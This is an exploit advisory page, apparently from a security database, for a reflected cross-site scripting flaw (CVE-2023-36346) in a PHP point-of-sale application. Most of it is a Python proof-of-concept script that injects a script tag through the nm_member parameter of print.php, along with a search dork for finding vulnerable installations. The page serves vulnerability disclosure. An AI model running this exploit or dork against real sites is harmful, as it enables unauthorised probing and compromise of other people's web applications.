Sales of Cashier Goods v1.0 Cross Site Scripting (XSS)

2023.07.06
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79

# Exploit Title: Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS) # Date: 2023-06-23 # country: Iran # Exploit Author: Amirhossein Bahramizadeh # Category : webapps # Dork : /print.php?nm_member= # Vendor Homepage: https://www.codekop.com/products/source-code-aplikasi-pos-penjualan-barang-kasir-dengan-php-mysql-3.html # Tested on: Windows/Linux # CVE : CVE-2023-36346 import requests import urllib.parse # Set the target URL and payload url = "http://example.com/print.php" payload = "<script>alert('XSS')</script>" # Encode the payload for URL inclusion payload = urllib.parse.quote(payload) # Build the request parameters params = { "nm_member": payload } # Send the request and print the response response = requests.get(url, params=params) print(response.text)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top